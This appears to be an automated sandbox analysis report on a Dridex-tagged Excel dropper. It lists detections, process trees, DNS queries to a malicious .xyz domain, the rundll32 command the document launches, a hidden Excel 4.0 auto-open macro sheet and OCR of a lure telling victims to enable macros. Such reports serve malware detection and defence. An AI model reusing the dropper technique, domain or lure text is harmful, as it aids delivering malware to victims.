Loading ...

Play interactive tourEdit tour

Analysis Report IovwfUybUJ.xlsx

Overview

General Information

Sample Name:IovwfUybUJ.xlsx
Analysis ID:411582
MD5:bcb5f8c6da6103a5bbd4891095f807af
SHA1:fccc0e19a042d3da003bc4184b32c784ca5dfd14
SHA256:9872498872843b5aae813d390df3e46ae02a4cc994ade723e4f5ba2973043fb7
Tags:Dridex
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Office document connecting to suspicious TLD
Outdated Microsoft Office dropper detected
Performs DNS queries to domains with low reputation
Potential document exploit detected (performs DNS queries with low reputation score)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2412 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2640 cmdline: rundll32 ..\iuhdvcl.ckd,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\iuhdvcl.ckd,DllRegisterServer, CommandLine: rundll32 ..\iuhdvcl.ckd,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2412, ProcessCommandLine: rundll32 ..\iuhdvcl.ckd,DllRegisterServer, ProcessId: 2640

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: qvqy23thdsed03xjeqtf.xyzVirustotal: Detection: 12%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: IovwfUybUJ.xlsxVirustotal: Detection: 40%Perma Link
Source: IovwfUybUJ.xlsxReversingLabs: Detection: 25%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs DNS queries with low reputation score)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: name: qvqy23thdsed03xjeqtf.xyz
Source: global trafficDNS query: name: qvqy23thdsed03xjeqtf.xyz

Networking:

barindex
Office document connecting to suspicious TLDShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS traffic detected: qvqy23thdsed03xjeqtf.xyz
Outdated Microsoft Office dropper detectedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: qvqy23thdsed03xjeqtf.xyz is down
Performs DNS queries to domains with low reputationShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDNS query: qvqy23thdsed03xjeqtf.xyz
Source: unknownDNS traffic detected: query: qvqy23thdsed03xjeqtf.xyz replaycode: Name error (3)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B18D72.pngJump to behavior
Source: rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: qvqy23thdsed03xjeqtf.xyz
Source: rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2099200495.0000000001C97000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2099200495.0000000001C97000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2099200495.0000000001C97000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2099200495.0000000001C97000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2099200495.0000000001C97000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please click Enab
Source: Screenshot number: 4Screenshot OCR: Enable Content 14 from the yellow bar above 15 16 17 18 WHY I CANNOTOPEN THIS DOCUMENT? 19 2
Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 15Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
Source: Document image extraction number: 15Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: IovwfUybUJ.xlsxInitial sample: CALL
Source: IovwfUybUJ.xlsxInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: IovwfUybUJ.xlsxInitial sample: Sheet size: 16417
Source: IovwfUybUJ.xlsxInitial sample: Sheet size: 5574
Source: workbook.xmlBinary string: " sheetId="1" r:id="rId1"/><sheet name="Doc1" sheetId="2" r:id="rId2"/><sheet name="Doc2" sheetId="3" r:id="rId3"/><sheet name="Doc3" sheetId="4" r:id="rId4"/><sheet name="Doc4" sheetId="5" r:id="rId5"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc3'!$AU$11</definedName></definedNames><calcPr calcId="145621"/></workbook>
Source: rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@3/11@1/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$IovwfUybUJ.xlsxJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD596.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iuhdvcl.ckd,DllRegisterServer
Source: IovwfUybUJ.xlsxVirustotal: Detection: 40%
Source: IovwfUybUJ.xlsxReversingLabs: Detection: 25%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iuhdvcl.ckd,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iuhdvcl.ckd,DllRegisterServerJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: IovwfUybUJ.xlsxInitial sample: OLE zip file path = xl/media/image3.png
Source: IovwfUybUJ.xlsxInitial sample: OLE zip file path = xl/media/image4.png
Source: IovwfUybUJ.xlsxInitial sample: OLE zip file path = xl/media/image1.png
Source: IovwfUybUJ.xlsxInitial sample: OLE zip file path = xl/media/image2.png
Source: IovwfUybUJ.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: IovwfUybUJ.xlsxInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution31Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
IovwfUybUJ.xlsx40%VirustotalBrowse
IovwfUybUJ.xlsx25%ReversingLabsDocument-Office.Infostealer.Dridex

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
qvqy23thdsed03xjeqtf.xyz12%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
qvqy23thdsed03xjeqtf.xyz
unknown
unknowntrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2099200495.0000000001C97000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2099200495.0000000001C97000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2099200495.0000000001C97000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpfalse
            high
            http://investor.msn.com/rundll32.exe, 00000003.00000002.2099010236.0000000001AB0000.00000002.00000001.sdmpfalse
              high

              Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:411582
              Start date:12.05.2021
              Start time:02:22:58
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 37s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:IovwfUybUJ.xlsx
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winXLSX@3/11@1/0
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsx
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Found warning dialog
              • Click Ok
              • Attach to Office via COM
              • Scroll down
              • Close Viewer

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32819ACB.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):557
              Entropy (8bit):7.343009301479381
              Encrypted:false
              SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
              MD5:A516B6CB784827C6BDE58BC9D341C1BD
              SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
              SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
              SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B18D72.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):8301
              Entropy (8bit):7.970711494690041
              Encrypted:false
              SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
              MD5:D8574C9CC4123EF67C8B600850BE52EE
              SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
              SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
              SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B18A11.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):34780
              Entropy (8bit):7.9888524748689225
              Encrypted:false
              SSDEEP:768:qKFodDvgUrYTD1EgYKRN4lME7h8kqn96Fv9DTVLlb:qK4Ys4xTYNlME78wVvVR
              MD5:3D0E5573022CD8A7F78291FC7959C19F
              SHA1:92A55931306950014C83BFB50997B5F1BAD489F1
              SHA-256:727E6480CC68136081EAF26F3CAD5C1970191F092BF44C524330365185A6E74C
              SHA-512:9E3F49874CE1FD1A97B3A7C192BE92515496D1E5F8883156A1C13F5BACD5A18BC1EE06EB9AE4A84E06A1919F4034D50A67E3EBD6FFC5743BEEC550C2F4F1BD85
              Malicious:false
              Reputation:low
              Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+......IDATx^....]U.>.LK....B.U.....E..O......g..{A@..)R.............x...I2..C.g.=g......k.{..+:;;..W..T..G.MMMO>.....][[[.a.U.V.....|gkk..c.<..1].Y..=...>x..../5P..u.l.T.>...i...K...+Wn.....cGCCC[[[cc._@s....8p...#.t..6ld.5c...;.p.7o.Q}..P{H.)^.!E...W5.s.N......Y.L...=.5....#.<.c.:......5..u.l.T....v...@?..c.<....>z...3.w.d.g....?.|.>q..............Z....u.l...}...u.]....u.....c..>z..I.&=....+N:........+R..;m.J.5.............Pwtt...mH"F^...]v.ev)....K...R...:O...4...O..@z.._.....T`.9.}.k_..WN.<......[5...nUoZx?.......?~....z.6....Q.. .......5../..........c..2.^.p.cD......k.-Z.....{_..A..>.....m=(#}..h ....N..{L..?.._.....6....{oO^t..g..}..7.B.g...R...m.J.'4 ..R#.!..7..zO....1d../.........{.........b..2.I.@.u...y....o...^......4hP.Y]]....VUUe...pG..n?....yc ...#...G>r.....<xOj/}..@..{R......n...!5.z....".. S.L.....0a..3.MCm..".3_....6m./h{...?I.b.%K....#D..
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5214BE50.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):848
              Entropy (8bit):7.595467031611744
              Encrypted:false
              SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
              MD5:02DB1068B56D3FD907241C2F3240F849
              SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
              SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
              SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
              C:\Users\user\AppData\Local\Temp\2FDE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):84052
              Entropy (8bit):7.898235354624251
              Encrypted:false
              SSDEEP:1536:AP7WynK4Ys4xTYNlME78wVvV2fiWpIxTFLVSSu8KW5W7YQu:AJK4YBkmI2qWpsFLg18KuwYQu
              MD5:D742F24BB867B2F33782A977D82523FE
              SHA1:96462A057F390033856182E9EE600D58266BD270
              SHA-256:3D32037F66CB3C88ABC251EB39612AA30A5AE7743C3C560EBFD7B03AA4117724
              SHA-512:539ED930AF06DD3BF9FEBAD78629A17559F4A356235F80674DD84A5006F010FFDFD5E2A37CBB3BFF959A073CB1616C53456EE504A94D2F9084403CB68D386AAE
              Malicious:false
              Reputation:low
              Preview: .U.n.0....?..........C....I?.&..an.0........%..E..y........"j.Zv..X.Nz.].....O..$...;h....,..?l.`E..[..>s...+.....|.".k.x.r-:...G..K.R.2.[..J<.T.nhy.d......T-.!.-E"......VZ.....t.!.P..$k..51.{H..!.G9...8........JFd.94TY.`..~..^a.;..0....F....1}......}\/._7.Ar..k.H0MI..BF........^..`*....j...?...e'.xDG.=.....b..s.o...]O.~9...&..=4s.....D..x.^.?...vb.....;...t.....}.1..s..b..PQ<g.|x.<..../........._&j....AL..3....3.>...|h)PG.y9$.........PK..........!..g.C....e.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed May 12 08:23:42 2021, atime=Wed May 12 08:23:42 2021, length=8192, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.488696264879744
              Encrypted:false
              SSDEEP:12:85QRRLgXg/XAlCPCHaXEKB8VXB/SnX+WnicvbCLbDtZ3YilMMEpxRljKATdJP9TK:85s/XT0K6VXMYeWXDv3qNrNru/
              MD5:CF9C7B389DC070C9FDD1BFAEF95CB8D8
              SHA1:27BEB192A5F9A87A6C73DC89148A5114D1B152CD
              SHA-256:510CE14870D11BCBC9F98A64BF281F149C4B944877B38F28B142CEAC462C5A4C
              SHA-512:549B39C25CECB37D7374B5C74DF2EA7637192D036AFED2D541191973CED586A0FF67DC380383020FE4A04C8F92181D864629B3E2BF075DD5B32506EB66210E7B
              Malicious:false
              Reputation:low
